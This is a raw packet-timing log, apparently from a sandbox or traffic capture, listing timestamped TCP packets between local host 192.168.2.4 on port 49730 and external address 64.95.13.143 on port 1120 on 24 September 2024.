Sep 24, 2024 17:46:12.317998886 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.318279982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.318286896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.318299055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.318305969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.318314075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.318327904 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.318339109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.318346024 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.318355083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.319436073 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.378175020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.378206968 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.378213882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.378218889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.378226995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.378232002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.378246069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.378276110 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.378355026 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.402261972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.402275085 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.402295113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.402302980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.402314901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.402323008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.402331114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.402395964 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.402442932 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.403436899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405085087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405092001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405105114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405164003 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.405230999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405237913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405250072 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405258894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405281067 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.405308008 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.405468941 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405476093 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405487061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405493021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405515909 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.405564070 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.405867100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405874014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405885935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405894041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405905008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.405919075 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.405950069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.406131029 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406135082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406147003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406153917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406161070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406172991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406178951 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.406188965 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406199932 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.406209946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406218052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406233072 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.406244040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406250954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406260014 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.406269073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406322002 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.406929016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406935930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406949043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406955957 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406970978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406981945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.406992912 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.407002926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.407007933 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.407021999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.407035112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.407037973 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.407058001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.407073975 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.407083988 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.407099009 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.407525063 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.407530069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.407541990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.407547951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.407557011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.407568932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.407579899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.407582045 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.407625914 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.407666922 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.408058882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408066034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408077002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408082962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408088923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408099890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408107042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408113003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408123970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408129930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408137083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408143997 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.408153057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408160925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408169985 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.408184052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408190012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408204079 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.408221006 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.408241034 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.408252001 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.409672976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409681082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409687042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409693003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409699917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409713030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409718990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409724951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409729958 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.409739971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409746885 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409759045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409765959 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.409775019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409785032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409786940 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.409796953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.409818888 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.409837961 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.410002947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410007954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410021067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410027981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410042048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410048962 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.410068035 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.410088062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410095930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410105944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410110950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410120010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410125971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410141945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410144091 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.410154104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410166025 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.410190105 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.410423994 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410430908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.410473108 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.411051989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.411058903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.411070108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.411096096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.411101103 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.411109924 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.411119938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.411128998 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.411140919 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.411165953 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.411192894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.466929913 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.470763922 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.470774889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.470788956 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.470850945 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.470892906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.470900059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.470911980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.470920086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.470947027 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.494668961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.494685888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.494700909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.494745970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.494752884 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.494765043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.494774103 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.494788885 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.494827032 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.497591019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.497602940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.497617960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.497659922 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.497689962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.497698069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.497709990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.497718096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.497735977 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.497756958 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.497936010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.497983932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.497991085 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.498001099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498008013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498019934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498037100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498044968 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.498373985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498380899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498389006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498395920 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498402119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498406887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498413086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498418093 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498425007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498436928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498466015 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.498495102 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.498893976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498902082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498914957 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498922110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498938084 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.498946905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498953104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.498960972 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.498982906 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.499273062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499279976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499286890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499293089 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499300003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499315023 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.499351978 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.499496937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499505043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499511957 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499519110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499525070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499531984 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499542952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499551058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.499560118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499568939 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499578953 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.499588013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499598026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.499608994 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.499634981 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.500272036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500279903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500287056 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500299931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500307083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500313044 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500320911 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.500339031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500344038 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500353098 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.500371933 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500381947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500386000 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.500395060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500402927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500407934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500417948 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.500428915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500447035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500449896 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.500459909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500471115 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.500480890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500488043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.500504017 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.500519037 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.501156092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501163960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501177073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501183033 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501189947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501204014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501215935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501218081 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.501230001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501236916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501249075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501254082 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.501265049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501276016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501283884 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501293898 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.501317978 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.501363993 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.501926899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501935959 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501948118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501955986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501961946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501975060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.501982927 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.501992941 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.502002001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.502015114 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.502022028 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.502028942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.502038002 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.502048016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.502057076 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.502068043 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.502103090 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.502599955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.502608061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.502650023 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.502964973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.502974987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.502983093 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.503016949 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.503041983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.503050089 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.503062963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.503071070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.503088951 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.503885031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.503932953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.503940105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.503973007 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.503998995 CEST	49730	1120	192.168.2.4	64.95.13.143
